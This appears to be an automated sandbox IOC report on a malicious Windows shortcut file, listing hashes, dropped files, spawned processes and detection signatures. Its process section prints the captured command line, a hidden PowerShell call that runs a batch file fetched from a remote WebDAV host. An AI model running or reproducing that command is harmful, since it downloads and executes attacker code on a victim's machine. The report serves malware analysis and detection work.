Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

Jc2Qesmmnc.lnk

MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Oct 28 21:03:06 2024, mtime=Mon Oct 28 21:03:06 2024, atime=Mon Oct 28 21:03:06 2024, length=450560, window=hidenormalshowminimized

initial sample

Details

Filetype:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Mon Oct 28 21:03:06 2024, mtime=Mon Oct 28 21:03:06 2024, atime=Mon Oct 28 21:03:06 2024, length=450560, window=hidenormalshowminimized
Entropy:	4.55586173722878
Filename:	Jc2Qesmmnc.lnk
Filesize:	1647
MD5:	ef1f19b69f90efd9144cc490eed3768b
SHA1:	f8b3019a21ff29b922c2a45986c4f22e29fbdeac
SHA256:	43b7f7cccb0213d30001fd8a50649b3e08acf1e2c9f845f3c0a71a42567beb4f
SHA512:	a2bc05c446058cc6143f4ee059a66e516b379498b0994e5f00fa5ff27cb3f37d94976f92d03b74489543231c660558ea65551ac2ba02ee5a16c814de7cce708a
SSDEEP:	24:8Y7mlc32mDvSwzKctWxyMqJhUWn4+/CWKd8lKTqG1YqVzsisOab/rMTcm:8Imi32gqkJOdB/Blab4c
Preview:	L..................F.... .......)...'..)...'.*.)...............................P.O. .:i.....+00.../C:\...................V.1.....^Y.Z..Windows.@........R.@^Y.Z..........................li..W.i.n.d.o.w.s.....Z.1.....]Y....System32..B........R.@]Y........

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Machine Learning detection for sample	AV Detection
Sample is known by Antivirus	System Summary
Windows shortcut file (LNK) contains relative path	System Summary

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Category:	dropped
Dump:	StartupProfileData-NonInteractive.1.dr
ID:	dr_3
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	1.1940658735648508
Encrypted:	false
Ssdeep:	3:NlllulJnp/p:NllU
Size:	64
Whitelisted:	false
Reputation:	moderate

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tebsxdq.gpg.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tebsxdq.gpg.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_3tebsxdq.gpg.psm1.1.dr
ID:	dr_2
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d35owhee.f53.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d35owhee.f53.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_d35owhee.f53.ps1.1.dr
ID:	dr_1
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Creates temporary files	System Summary

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q4U8ZU6C2RB2N8PIOLO1.temp

data

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q4U8ZU6C2RB2N8PIOLO1.temp
Category:	dropped
Dump:	Q4U8ZU6C2RB2N8PIOLO1.temp.1.dr
ID:	dr_0
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	3.7812214121064436
Encrypted:	false
Ssdeep:	48:vu6E5nSW+57lxCSogZoHFyW+57l+CSogZoh1:vjEIW+57zHjW+57SHy
Size:	4600
Whitelisted:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms (copy)

data

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms (copy)
Category:	dropped
Dump:	Q4U8ZU6C2RB2N8PIOLO1.temp.1.dr
ID:	dr_4
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	3.7812214121064436
Encrypted:	false
Ssdeep:	48:vu6E5nSW+57lxCSogZoHFyW+57l+CSogZoh1:vjEIW+57zHjW+57SHy
Size:	4600
Whitelisted:	false
Reputation:	timeout

Processes

Path

Cmdline

Malicious

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iex '& \\kendychop.shop@9240\DavWWWRoot\new.bat'"

Details

Is windows:	true
Is dropped:	false
PID:	7556
Target ID:	1
Parent PID:	2592
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iex '& \\kendychop.shop@9240\DavWWWRoot\new.bat'"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	03:43:21
Date:	13/11/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6eb350000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Windows shortcut file (LNK) contains relative path	System Summary

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7564
Target ID:	2
Parent PID:	7556
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	03:43:21
Date:	13/11/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff68cce0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
Jc2Qesmmnc.lnk

Files

Processes

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportJc2Qesmmnc.lnk

Files

Processes

IOC Report
Jc2Qesmmnc.lnk